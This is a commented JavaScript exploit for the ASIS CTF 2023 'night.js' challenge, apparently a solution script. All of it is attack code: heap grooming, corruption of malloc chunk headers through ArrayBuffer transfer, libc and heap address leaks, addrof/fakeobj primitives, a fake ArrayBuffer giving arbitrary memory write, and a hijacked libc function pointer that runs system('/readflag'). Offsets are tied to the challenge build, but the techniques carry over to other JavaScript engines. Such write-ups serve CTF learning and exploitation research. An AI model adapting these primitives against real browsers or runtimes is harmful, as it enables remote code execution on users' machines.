ASIS CTF 2023 - night.js exploit (heap-layout-dependent; all offsets are specific to the challenge build)
// Heap grooming. `refs` is deliberately an implicit global (no let/const): it
// must stay reachable from stage 2 below, which passes it to addrof().
refs = new Array(0x100);
// "chunk consumer": 0x20 rounds of an ArrayBuffer (0x200-byte backing store),
// a 0x130-slot Array and a 0x40-slot Array, every one kept alive by pushing it
// onto refs. Presumably this drains cached/free chunks of those size classes so
// the allocations made in the two stages below are served from fresh, adjacent
// memory -- TODO confirm against the allocator the challenge engine uses.
// The count and the order of the three pushes are part of the layout; do not
// reorder or coalesce them.
for (let i = 0; i < 0x20; ++i) {
  refs.push(new ArrayBuffer(0x200));
  refs.push(new Array(0x130));
  refs.push(new Array(0x40));
}
// Stage 1: libc leak. Sets the implicit globals `libc_leak` (used by stage 2)
// and `arr`. Nothing here is discovered at runtime: the 0x11abd00 delta noted
// below, like every other constant in this script, is specific to the
// challenge build of night.js and its libc.
{
  // Backing stores expected to be allocated back to back: two 0x200-byte
  // chunks, then a large 0x3df0-byte one whose contents are read back through
  // a BigUint64Array view after the allocator has been made to write into it.
  let leak_chunk1 = new ArrayBuffer(0x200);
  let leak_chunk2 = new ArrayBuffer(0x200);
  let leak_chunk3 = new ArrayBuffer(0x3df0);
  let leak_chunk3_bi = new BigUint64Array(leak_chunk3);
  // Guard allocation placed right after leak_chunk3 -- presumably so that
  // leak_chunk3 does not border the top chunk; TODO confirm.
  let leak_chunk3_guard = new ArrayBuffer(0x200);
  // 0x210-byte buffer that is shrunk to 0x200 below (transferToFixedLength).
  // The two qwords at byte offsets 0x200 and 0x208 (still in bounds for 0x210)
  // look like a malloc chunk header: prev_size = 0, size = 0x4010|PREV_INUSE.
  // NOTE(review): presumably the engine's transfer bug makes these bytes become
  // the metadata of the chunk that follows the shrunk buffer; the exact defect
  // in night.js is not visible here -- verify against the patched engine.
  let oob_ab = new ArrayBuffer(0x210);
  let oob_bi = new BigUint64Array(oob_ab);
  oob_bi[64] = 0x0n;
  oob_bi[65] = 0x4011n;
  // Detach/shrink/detach in a fixed order. The returned buffers are dropped on
  // purpose; only the side effects on allocator state are wanted.
  leak_chunk1.transfer();
  oob_ab.transferToFixedLength(0x200);
  leak_chunk2.transfer();
  // Implicit global. Allocating a 0x40-element Array and storing a double into
  // it presumably performs the allocation that makes the allocator write a
  // libc pointer into leak_chunk3's data -- TODO confirm.
  arr = new Array(0x40);
  arr[0] = 1.1;
  // First qword of leak_chunk3 now holds a libc pointer (a bin fd/bk pointer is
  // the usual candidate); the original comment records it as libc + 0x11abd00.
  libc_leak = leak_chunk3_bi[0]; // +0x11abd00
  console.log(`libc_leak: 0x${libc_leak.toString(16)}`)
}
// Stage 2: addrof/fakeobj primitives, a fake ArrayBuffer for arbitrary write,
// then a hijacked function pointer to run system("/readflag").
// Reads the globals `libc_leak` (stage 1) and `refs` (grooming loop) and sets
// the implicit globals heap_leak, heap_base, fake_ab_addr, arraybuffer_vtable
// and arraybuffer_prototype.
{
  let chunk1 = new ArrayBuffer(0x200);
  let chunk2 = new ArrayBuffer(0x200);
  // chunk3 is accessed only through chunk3_bi; after the frees below its data
  // is expected to overlap the element storage of `arr` (see addrof/fakeobj).
  let chunk3 = new ArrayBuffer(0x200);
  let chunk3_bi = new BigUint64Array(chunk3);
  // Large buffer inside which the fake ArrayBuffer object is built (at +0x4000).
  let chunk4 = new ArrayBuffer(0x8000);
  let chunk4_bi = new BigUint64Array(chunk4);
  // Holds the command string; its backing store is freed at the very end.
  let command_buffer = new ArrayBuffer(0x400);
  let command_buffer_bi = new BigUint64Array(command_buffer);
  // Same trick as stage 1 with a different fake size: 0x421 = 0x420|PREV_INUSE,
  // written at byte offsets 0x200/0x208 of a 0x210-byte buffer that is then
  // shrunk to 0x200.
  let oob_ab = new ArrayBuffer(0x210);
  let oob_bi = new BigUint64Array(oob_ab);
  oob_bi[64] = 0x0n;
  oob_bi[65] = 0x421n;
  // Order matters (allocator grooming); return values deliberately dropped.
  chunk1.transfer();
  oob_ab.transferToFixedLength(0x200);
  chunk2.transfer();
  // Block-scoped `arr` shadows the implicit global `arr` from stage 1.
  // Storing a double at index 66 presumably switches the array to unboxed
  // double elements; index 66 (66 * 8 = 0x210 bytes in) is the slot that
  // aliases chunk3_bi[0] -- TODO confirm the layout assumption.
  let arr = new Array(130);
  arr[66] = 13.37;
  // addrof: store the object reference in the aliased slot and read the raw
  // qword back through the typed array. The mask drops the upper 16 bits, the
  // same tag that fakeobj() ORs back in (0xfff9...), which looks like a
  // NaN-boxing object tag.
  function addrof(o) {
    arr[66] = o;
    return chunk3_bi[0] & 0xffffffffffffn;
  }
  // All deltas below are hard-coded for the challenge build: heap base relative
  // to `refs`, the ArrayBuffer vtable relative to the libc leak, and
  // ArrayBuffer.prototype relative to the heap base. They will not survive a
  // rebuild of the engine or a different libc.
  heap_leak = addrof(refs);
  heap_base = heap_leak - 0x82f00n;
  // Expected address of chunk4's data + 0x4000, where the fake object is built.
  fake_ab_addr = heap_base + 0xfd010n;
  console.log(`heap_leak: 0x${heap_leak.toString(16)}`);
  console.log(`heap_base: 0x${heap_base.toString(16)}`);
  console.log(`fake_ab_addr: 0x${fake_ab_addr.toString(16)}`);
  arraybuffer_vtable = libc_leak + 0xa3a0a8n;
  arraybuffer_prototype = heap_base + 0x83680n;
  console.log(`arraybuffer_vtable: 0x${arraybuffer_vtable.toString(16)}`);
  console.log(`arraybuffer_prototype: 0x${arraybuffer_prototype.toString(16)}`);
  // Fake ArrayBuffer object laid out in chunk4 at qword index 0x800 (byte
  // offset 0x4000). Field names follow the original comments. The qword at
  // index 0x800-2 (byte 0x3ff0, just before the object) is a heap pointer whose
  // meaning is not stated here -- possibly a header the engine validates before
  // using the object; TODO confirm.
  chunk4_bi[0x800-2] = heap_base + 0x000000000001a370n;
  chunk4_bi[0x800+0] = arraybuffer_vtable; // vtable
  chunk4_bi[0x800+1] = 0x1000n; // length
  chunk4_bi[0x800+2] = arraybuffer_prototype; // prototype
  chunk4_bi[0x800+12] = 0x1000n; // byteLength
  chunk4_bi[0x800+14] = 0x1n; // isAttached
  // fakeobj: write a tagged pointer into the aliased slot and read it back as a
  // JS value, so the engine treats the memory at addr as an object.
  function fakeobj(addr) {
    chunk3_bi[0] = addr | 0xfff9000000000000n;
    return arr[66];
  }
  // Typed-array view over the fake buffer. write64() shows that the qword at
  // chunk4_bi[0x808] (fake object + 0x40) is evidently used as its data pointer.
  let fake_ab = fakeobj(fake_ab_addr);
  let fake_ab_bi = new BigUint64Array(fake_ab);
  // Arbitrary 8-byte write: repoint the fake buffer's data pointer at addr,
  // then store value through element 0 of the view.
  function write64(addr, value) {
    chunk4_bi[0x808] = addr;
    fake_ab_bi[0] = value;
  }
  // "/readflag\0" as two little-endian qwords.
  command_buffer_bi[0] = 0x616c66646165722fn;
  command_buffer_bi[1] = 0x67n;
  // system("/readflag"): overwrite the function pointer at libc_leak + 0xa57720
  // (a writable address fixed relative to the libc leak) with, per the original
  // comment, system's address, then detach command_buffer so its backing store
  // is freed. Presumably that free path is what reaches the overwritten pointer
  // with the buffer contents as the argument -- TODO confirm which pointer this
  // is; it is not identified anywhere in this script.
  write64(libc_leak + 0xa57720n, libc_leak - 0x208ad0n);
  command_buffer.transfer();
  // Park the process so nothing else (exit handlers, GC) runs over the
  // corrupted heap while the command executes.
  while(1);
}